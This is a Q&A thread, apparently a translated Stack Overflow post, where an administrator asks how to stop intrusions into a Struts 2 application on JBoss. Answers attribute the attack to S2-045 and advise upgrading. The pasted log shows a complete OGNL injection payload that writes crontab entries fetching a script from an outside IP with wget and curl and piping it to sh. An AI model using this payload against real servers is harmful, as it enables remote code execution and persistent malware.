【问题标题】:JBOSS Struts 2 application intrusionsJBOSS Struts 2 应用入侵
【发布时间】:2017-04-27 17:50:03
【问题描述】:

我们有一个 J2EE Struts 2 应用程序。

最近我们看到一些入侵正在进入我们在端口 80 上运行的应用程序。Jboss(4.2.0 版)错误日志显示:

请求不包含 multipart/form-data 或 multipart/form-data 流,内容类型标头为 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext @DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com. opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))) .(#cmd='echo "15 * * * * wget -O - -q http://91.230.47.41/res/logo.jpg|sh\n50 * * * * curl http://91.230.47.41/res/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System @getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/ bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start ()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),# ros)).(#ros.flush())}

他们将一些 .exe 文件注入到 Jboss bin 文件夹中,并试图中断应用程序和服务器。已经在那里安装了一些杀毒软件。但这并没有停止。考虑如何阻止他们进入应用程序。

任何好主意都会有所帮助。

【问题讨论】:

  • 除了升级,检查这个 repo -> github.com/apache/struts-extras。另请注意,即使使用最新升级,您仍然可以在日志中看到错误,但基本问题已修复。
  • 升级到2.3.32版本安全吗?因为不需要更改代码。我在想是否有任何方法可以禁用整个多部分文件上传?

标签: java security jakarta-ee jboss struts2


【解决方案1】:

您已通过S2-045 严重安全问题受到攻击。

解决问题的最简单方法是立即升级到 2.3.322.5.10.1
(前者几乎需要零重构,后者将需要快速迁移,如 Struts 2.3 to 2.5 Migration Guide 中所述)。

始终保持最新状态。

【讨论】:

  • 升级到2.3.32版本安全吗?因为不需要更改代码。我在想是否有任何方法可以禁用整个多部分文件上传?
  • 安全,2.3.32是最新的2.3维护版本,修复了每一个bug/问题。
  • 我已将我的库更新到 2.3.32,但仍然遇到同样的错误。使用struts2的应用程序不安全吗?
  • 今天是 2.3.34。如果你修补那个东西,你的应用程序是安全的。如果您收到了关于 Equifax 事件 的愚蠢 DZone 时事通讯,请不要介意。如果你一直等到今天才修补你的代码,那么问题不在于 Struts2,而在于你。
  • 我已经在你早些时候的帖子之后更新了它,即 4 月 27 日。但是 Equifax 事件是什么?我的问题可能是什么?
猜你喜欢
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 2011-03-22
  • 2013-03-18
  • 2012-03-23
相关资源
最近更新 更多